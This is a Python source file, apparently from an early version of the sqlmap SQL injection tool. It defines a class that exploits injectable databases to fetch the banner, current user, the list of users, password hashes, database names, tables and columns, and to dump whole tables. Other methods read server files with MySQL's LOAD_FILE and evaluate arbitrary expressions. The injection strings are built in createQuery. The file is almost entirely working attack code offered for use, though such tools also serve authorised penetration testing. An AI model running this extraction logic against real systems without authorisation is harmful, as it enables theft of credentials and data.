#!/usr/bin/env python


import logging
import re
import time

from sqlmap.dump import Dump
from sqlmap.union import UnionUse
from sqlmap.settings import MYSQL_SYSTEM_DBS
from sqlmap.settings import PGSQL_SYSTEM_DBS
from sqlmap.settings import ORACLE_SYSTEM_DBS


class QueryMap(UnionUse):
    """
    This class defines a generic map for plugins

    @author: Bernardo Damele
    """

    def __init__(self, args, dbms):
        self.logger = logging.getLogger("sqlmapLog")

        self.args = args
        self.dbmsQueries = self.args.queries[dbms]

        self.banner                 = ""
        self.currentUser            = ""
        self.currentDb              = ""
        self.fingerprint            = []
        self.cachedUsers            = []
        self.cachedUsersPassword    = {}
        self.cachedDbs              = []
        self.cachedTables           = {}
        self.cachedColumns          = {}
        self.dumpedTable            = {}

        if dbms == "MySQL":
            self.__excludeDbsList = MYSQL_SYSTEM_DBS
        elif dbms == "PostgreSQL":
            self.__excludeDbsList = PGSQL_SYSTEM_DBS
        elif dbms == "Oracle":
            self.__excludeDbsList = ORACLE_SYSTEM_DBS


    def unescape(self, expression):
        errMsg  = "'unescape' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise Exception, errMsg


    def getFingerprint(self):
        errMsg  = "'getFingerprint' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise Exception, errMsg


    def checkDbms(self):
        errMsg  = "'checkDbms' method must be defined "
        errMsg += "into the specific DBMS plugin"
        raise Exception, errMsg


    def createQuery(self):
        query = self.dbmsQueries["inference"]

        return self.injectionQuery(" %s"               % query,
                                   " %s AND '1'='1"    % query,
                                   " %s AND \"1\"=\"1" % query)


    def getBanner(self):
        logMsg = "fetching banner"
        self.logger.info(logMsg)

        query = self.dbmsQueries["banner"]

        if not self.banner:
            self.banner = self.getValue(query)

        return self.banner


    def getCurrentUser(self):
        logMsg = "fetching current user"
        self.logger.info(logMsg)

        query = self.dbmsQueries["currentUser"]

        if not self.currentUser:
            self.currentUser = self.getValue(query)

        return self.currentUser


    def getCurrentDb(self):
        logMsg = "fetching current database"
        self.logger.info(logMsg)

        query = self.dbmsQueries["currentDb"]

        if not self.currentDb:
            self.currentDb = self.getValue(query)

        return self.currentDb


    def getUsers(self):
        logMsg = "fetching database users"
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["users"]

        if self.args.unionUse:
            query = rootQuery["inband"]["query"]
            value = self.getValue(query, blind=False)

            if value:
                self.cachedUsers = value

        if not self.cachedUsers:
            logMsg = "fetching number of database users"
            self.logger.info(logMsg)

            query = rootQuery["blind"]["count"]
            count = self.getValue(query, inband=False)

            if not len(count) or count == "0":
                errMsg = "unable to retrieve the number of database users"
                raise Exception, errMsg

            if self.args.fingerprint == "Oracle":
                indexRange = range(1, int(count) + 1)
            else:
                indexRange = range(0, int(count))

            for index in indexRange:
                query = rootQuery["blind"]["query"] % index
                user = self.getValue(query, inband=False)

                if user:
                    self.cachedUsers.append(user)

        if not self.cachedUsers:
            errMsg = "unable to retrieve the database users"
            raise Exception, errMsg

        return self.cachedUsers


    def getPasswordHashes(self):
        logMsg = "fetching database users password hashes"
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["passwords"]

        if self.args.unionUse:
            query = rootQuery["inband"]["query"]
            value = self.getValue(query, blind=False)

            if value:
                for user, password in value:
                    if not self.cachedUsersPassword.has_key(user):
                        self.cachedUsersPassword[user] = [password]
                    else:
                        self.cachedUsersPassword[user].append(password)

        if not self.cachedUsersPassword:
            if not self.cachedUsers:
                self.cachedUsers = self.getUsers()

            for user in self.cachedUsers:
                logMsg  = "fetching number of password hashes "
                logMsg += "for user '%s'" % user
                self.logger.info(logMsg)

                query = rootQuery["blind"]["count"] % user
                count = self.getValue(query, inband=False)

                if not len(count) or count == "0":
                    warnMsg  = "unable to retrieve the number of password "
                    warnMsg += "hashes for user '%s'" % user
                    self.logger.warn(warnMsg)
                    continue

                logMsg = "fetching password hashes for user '%s'" % user
                self.logger.info(logMsg)

                passwords = []

                if self.args.fingerprint == "Oracle":
                    indexRange = range(1, int(count) + 1)
                else:
                    indexRange = range(0, int(count))

                for index in indexRange:
                    query = rootQuery["blind"]["query"] % (user, index)
                    password = self.getValue(query, inband=False)
                    passwords.append(password)

                if passwords:
                    self.cachedUsersPassword[user] = passwords
                else:
                    warnMsg  = "unable to retrieve the password "
                    warnMsg += "hashes for user '%s'" % user
                    self.logger.warn(warnMsg)

        if not self.cachedUsersPassword:
            errMsg  = "unable to retrieve the password "
            errMsg += "hashes for the database users"
            raise Exception, errMsg

        return self.cachedUsersPassword


    def getDbs(self):
        if self.args.fingerprint == "MySQL" and not self.has_information_schema:
            warnMsg  = "information_schema not available, "
            warnMsg += "remote database is MySQL < 5. database "
            warnMsg += "names will be fetched from 'mysql' table"
            self.logger.warn(warnMsg)

        logMsg = "fetching database names"
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["dbs"]

        if self.args.unionUse:
            if self.args.fingerprint == "MySQL" and not self.has_information_schema:
                query = rootQuery["inband"]["query2"]
            else:
                query = rootQuery["inband"]["query"]
            value = self.getValue(query, blind=False)

            if value:
                self.cachedDbs = value

        if not self.cachedDbs:
            logMsg = "fetching number of databases"
            self.logger.info(logMsg)

            if self.args.fingerprint == "MySQL" and not self.has_information_schema:
                query = rootQuery["blind"]["count2"]
            else:
                query = rootQuery["blind"]["count"]
            count = self.getValue(query, inband=False)

            if not len(count) or count == "0":
                errMsg = "unable to retrieve the number of databases"
                raise Exception, errMsg

            if self.args.fingerprint == "Oracle":
                indexRange = range(1, int(count) + 1)
            else:
                indexRange = range(0, int(count))

            for index in indexRange:
                if self.args.fingerprint == "MySQL" and not self.has_information_schema:
                    query = rootQuery["blind"]["query2"] % index
                else:
                    query = rootQuery["blind"]["query"] % index
                db = self.getValue(query, inband=False)

                if db:
                    self.cachedDbs.append(db)

        if not self.cachedDbs:
            errMsg = "unable to retrieve the database names"
            raise Exception, errMsg

        return self.cachedDbs


    def getTables(self):
        if self.args.fingerprint == "MySQL" and not self.has_information_schema:
            errMsg  = "information_schema not available, "
            errMsg += "remote database is MySQL < 5.0"
            raise Exception, errMsg

        logMsg = "fetching tables"
        if self.args.db:
            logMsg += " for database '%s'" % self.args.db
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["tables"]

        if self.args.fingerprint == "Oracle" and self.args.db:
            self.args.db = self.args.db.upper()

        if self.args.unionUse:
            query = rootQuery["inband"]["query"]
            condition = rootQuery["inband"]["condition"]

            if self.args.db:
                if "," in self.args.db:
                    dbs = self.args.db.split(",")
                    query += " WHERE "
                    query += " OR ".join(condition + "='%s'" % db for db in dbs)
                else:
                    query += " WHERE %s='%s'" % (condition, self.args.db)
            elif self.args.excludeSysDbs:
                query += " WHERE "
                query += " AND ".join(condition + "!='%s'" % db for db in self.__excludeDbsList)
                logMsg = "skipping system databases '%s'" % ", ".join(db for db in self.__excludeDbsList)
                self.logger.info(logMsg)

            value = self.getValue(query, blind=False)

            if value:
                for db, table in value:
                    if not self.cachedTables.has_key(db):
                        self.cachedTables[db] = [table]
                    else:
                        self.cachedTables[db].append(table)

        if not self.cachedTables:
            if self.args.db:
                if "," in self.args.db:
                    dbs = self.args.db.split(",")
                else:
                    dbs = [self.args.db]
            else:
                if not len(self.cachedDbs):
                    dbs = self.getDbs()
                else:
                    dbs = self.cachedDbs

            for db in dbs:
                if self.args.excludeSysDbs and db in self.__excludeDbsList:
                    logMsg = "skipping system database '%s'" % db
                    self.logger.info(logMsg)

                    continue

                logMsg  = "fetching number of tables for "
                logMsg += "database '%s'" % db
                self.logger.info(logMsg)

                query = rootQuery["blind"]["count"] % db
                count = self.getValue(query, inband=False)

                if not len(count) or count == "0":
                    warnMsg  = "unable to retrieve the number of "
                    warnMsg += "tables for database '%s'" % db
                    self.logger.warn(warnMsg)
                    continue

                tables = []

                if self.args.fingerprint == "Oracle":
                    indexRange = range(1, int(count) + 1)
                else:
                    indexRange = range(0, int(count))

                for index in indexRange:
                    query = rootQuery["blind"]["query"] % (db, index)
                    table = self.getValue(query, inband=False)
                    tables.append(table)

                if tables:
                    self.cachedTables[db] = tables
                else:
                    warnMsg  = "unable to retrieve the tables "
                    warnMsg += "for database '%s'" % db
                    self.logger.warn(warnMsg)

        if not self.cachedTables:
            errMsg = "unable to retrieve the tables for any database"
            raise Exception, errMsg

        return self.cachedTables


    def getColumns(self, onlyColNames=False):
        if self.args.fingerprint == "MySQL" and not self.has_information_schema:
            errMsg  = "information_schema not available, "
            errMsg += "remote database is MySQL < 5.0"
            raise Exception, errMsg

        if not self.args.tbl:
            errMsg = "missing table parameter"
            raise Exception, errMsg

        if "." in self.args.tbl:
            self.args.db, self.args.tbl = self.args.tbl.split(".")

        if not self.args.db and self.args.fingerprint != "Oracle":
            errMsg  = "missing database parameter"
            raise Exception, errMsg

        logMsg  = "fetching columns "
        logMsg += "for table '%s' " % self.args.tbl
        logMsg += "on database '%s'" % self.args.db
        self.logger.info(logMsg)

        rootQuery = self.dbmsQueries["columns"]

        if self.args.fingerprint == "Oracle":
            self.args.db = self.args.db.upper()
            self.args.tbl = self.args.tbl.upper()

        if self.args.unionUse:
            if self.args.fingerprint in ( "MySQL", "PostgreSQL" ):
                query = rootQuery["inband"]["query"] % (self.args.tbl, self.args.db)
            elif self.args.fingerprint == "Oracle":
                query = rootQuery["inband"]["query"] % self.args.tbl.upper()
            elif self.args.fingerprint == "Microsoft SQL Server":
                query = rootQuery["inband"]["query"] % (self.args.db, self.args.db,
                                                        self.args.db, self.args.tbl,
                                                        self.args.db, self.args.db,
                                                        self.args.db)

            value = self.getValue(query, blind=False)

            if value:
                table = {}
                columns = {}
                for column, colType in value:
                    columns[column] = colType
                table[self.args.tbl] = columns
                self.cachedColumns[self.args.db] = table

        if not self.cachedColumns:
            logMsg  = "fetching number of columns "
            logMsg += "for table '%s'" % self.args.tbl
            logMsg += " on database '%s'" % self.args.db
            self.logger.info(logMsg)

            if self.args.fingerprint in ( "MySQL", "PostgreSQL" ):
                query = rootQuery["blind"]["count"] % (self.args.tbl, self.args.db)
            elif self.args.fingerprint == "Oracle":
                query = rootQuery["blind"]["count"] % self.args.tbl.upper()
            elif self.args.fingerprint == "Microsoft SQL Server":
                query = rootQuery["blind"]["count"] % (self.args.db, self.args.db,
                                                       self.args.db, self.args.tbl,
                                                       self.args.db, self.args.db,
                                                       self.args.db)

            count = self.getValue(query, inband=False)

            if not len(count) or count == "0":
                errMsg  = "unable to retrieve the number of columns "
                errMsg += "for table '%s' " % self.args.tbl
                errMsg += "on database '%s'" % self.args.db
                raise Exception, errMsg

            table = {}
            columns = {}

            if self.args.fingerprint == "Oracle":
                indexRange = range(1, int(count) + 1)
            else:
                indexRange = range(0, int(count))

            for index in indexRange:
                if self.args.fingerprint in ( "MySQL", "PostgreSQL" ):
                    query = rootQuery["blind"]["query"] % (self.args.tbl, self.args.db, index)
                elif self.args.fingerprint == "Oracle":
                    query = rootQuery["blind"]["query"] % (self.args.tbl.upper(), index)
                elif self.args.fingerprint == "Microsoft SQL Server":
                    query = rootQuery["blind"]["query"] % (self.args.db, self.args.db,
                                                           self.args.db, self.args.tbl,
                                                           self.args.db, self.args.db,
                                                           self.args.db, index, self.args.db,
                                                           self.args.db, self.args.db,
                                                           self.args.tbl, self.args.db,
                                                           self.args.db, self.args.db)

                column = self.getValue(query, inband=False)

                if not onlyColNames:
                    if self.args.fingerprint in ( "MySQL", "PostgreSQL" ):
                        query = rootQuery["blind"]["query2"] % (self.args.tbl, column, self.args.db)
                    elif self.args.fingerprint == "Oracle":
                        query = rootQuery["blind"]["query2"] % (self.args.tbl.upper(), column)
                    elif self.args.fingerprint == "Microsoft SQL Server":
                        query = rootQuery["blind"]["query2"] % (self.args.db, self.args.db,
                                                                column, self.args.db,
                                                                self.args.tbl)

                    colType = self.getValue(query, inband=False)
                    columns[column] = colType
                else:
                    columns[column] = None

            if columns:
                table[self.args.tbl] = columns
                self.cachedColumns[self.args.db] = table

        if not self.cachedColumns:
            errMsg  = "unable to retrieve the columns "
            errMsg += "for table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db
            raise Exception, errMsg

        return self.cachedColumns


    def dumpTable(self):
        if self.args.fingerprint == "MySQL" and not self.has_information_schema:
            errMsg  = "information_schema not available, "
            errMsg += "remote database is MySQL < 5.0"
            raise Exception, errMsg

        if not self.args.tbl:
            raise Exception, "missing table parameter"

        if "." in self.args.tbl:
            self.args.db, self.args.tbl = self.args.tbl.split(".")

        if self.args.fingerprint == "Oracle":
            if not self.args.db:
                errMsg  = "missing database parameter"
                raise Exception, errMsg
            else:
                self.args.db = self.args.db.upper()
                self.args.tbl = self.args.tbl.upper()

        rootQuery = self.dbmsQueries["dumpTable"]

        logMsg = "fetching"
        if self.args.col:
            colList = self.args.col.split(",")
            colString = ", ".join(column for column in colList)
            logMsg += " columns '%s'" % colString
        logMsg += " entries for table '%s'" % self.args.tbl
        logMsg += " on database '%s'" % self.args.db
        self.logger.info(logMsg)

        if self.args.col:
            self.cachedColumns[self.args.db] = {}
            self.cachedColumns[self.args.db][self.args.tbl] = {}
            for column in colList:
                self.cachedColumns[self.args.db][self.args.tbl][column] = None
        elif not self.cachedColumns:
            self.cachedColumns = self.getColumns(onlyColNames=True)

        colList = self.cachedColumns[self.args.db][self.args.tbl].keys()
        colList.sort(key=lambda x: x.lower())
        colString = ", ".join(column for column in colList)

        if self.args.unionUse:
            if self.args.fingerprint == "Oracle":
                query = rootQuery["inband"]["query"] % (colString, self.args.tbl.upper())
            else:
                query = rootQuery["inband"]["query"] % (colString, self.args.db, self.args.tbl)
            entries = self.getValue(query, blind=False)

            if entries:
                count = len(entries)
                index = 0

                for column in colList:
                    colLen = len(column)

                    if not self.dumpedTable.has_key(column):
                        self.dumpedTable[column] = { "length": 0, "values": [] }

                    for entry in entries:
                        if isinstance(entry, str):
                            colEntry = entry
                        else:
                            colEntry = entry[index]

                        colEntryLen = len(colEntry)
                        maxLen = max(colLen, colEntryLen)

                        if maxLen > self.dumpedTable[column]["length"]:
                            self.dumpedTable[column]["length"] = maxLen

                        self.dumpedTable[column]["values"].append(colEntry)

                    index += 1

        if not self.dumpedTable:
            logMsg = "fetching number of "
            if self.args.col:
                logMsg += "columns '%s' " % colString
            logMsg += "entries for table '%s' " % self.args.tbl
            logMsg += "on database '%s'" % self.args.db
            self.logger.info(logMsg)

            if self.args.fingerprint == "Oracle":
                query = rootQuery["blind"]["count"] % self.args.tbl.upper()
            else:
                query = rootQuery["blind"]["count"] % (self.args.db, self.args.tbl)
            count = self.getValue(query, inband=False)

            if not len(count) or count == "0":
                errMsg = "unable to retrieve the number of "
                if self.args.col:
                    errMsg += "columns '%s' " % colString
                errMsg += "entries for table '%s' " % self.args.tbl
                errMsg += "on database '%s'" % self.args.db
                raise Exception, errMsg

            for column in colList:
                length = 0
                entries = []
                columnData = {}
                self.dumpedTable[column] = {}

                if self.args.fingerprint == "Oracle":
                    indexRange = range(1, int(count) + 1)
                else:
                    indexRange = range(0, int(count))

                for index in indexRange:
                    if self.args.fingerprint in ( "MySQL", "PostgreSQL" ):
                        query = rootQuery["blind"]["query"] % (column, self.args.db,
                                                               self.args.tbl, colList[0],
                                                               index)
                    elif self.args.fingerprint == "Oracle":
                        query = rootQuery["blind"]["query"] % (column, column,
                                                               self.args.tbl.upper(),
                                                               colList[0], index)
                    elif self.args.fingerprint == "Microsoft SQL Server":
                        query = rootQuery["blind"]["query"] % (column, self.args.db,
                                                               self.args.tbl, column,
                                                               index, column,
                                                               self.args.db, self.args.tbl,
                                                               colList[0], colList[0])

                    value = self.getValue(query, inband=False)

                    length = max(length, len(str(value)))
                    entries.append(value)

                if length < len(column):
                    columnData["length"] = len(column)
                else:
                    columnData["length"] = length

                columnData["values"] = entries
                self.dumpedTable[column] = columnData

        if self.dumpedTable:
            self.dumpedTable["__infos__"] = {
                                                "count": count,
                                                "table": self.args.tbl,
                                                "db": self.args.db
                                              }
        else:
            errMsg = "unable to retrieve the entries of "
            if self.args.col:
                errMsg += "columns '%s' " % colString
            errMsg += "for table '%s' " % self.args.tbl
            errMsg += "on database '%s'" % self.args.db

            if self.args.dumpAll:
                self.logger.warn(errMsg)
            else:
                raise Exception, errMsg

        return self.dumpedTable


    def dumpAll(self):
        if self.args.fingerprint == "MySQL" and not self.has_information_schema:
            errMsg  = "information_schema not available, "
            errMsg += "remote database is MySQL < 5.0"
            raise Exception, errMsg

        dumper = Dump(self.args)

        self.args.db = None
        self.args.tbl = None
        self.args.col = None

        self.cachedDbs = []
        self.cachedColumns = {}
        self.dumpedTable = {}

        self.cachedTables = self.getTables()

        for db, tables in self.cachedTables.items():
            self.args.db = db

            for table in tables:
                self.args.tbl = table
                self.cachedColumns = {}
                self.dumpedTable = {}

                data = self.dumpTable()

                if data:
                    dumper.dbTableValues(data)


    def getFile(self, filename):
        if self.args.fingerprint != "MySQL":
            errMsg = "this plugin does not support file reading"
            raise Exception, errMsg

        logMsg = "fetching file: '%s'" % filename
        self.logger.info(logMsg)

        return self.getValue("LOAD_FILE('%s')" % filename)


    def getExpr(self, expression):
        logMsg = "fetching expression output: '%s'" % expression
        self.logger.info(logMsg)

        return self.getValue(expression)

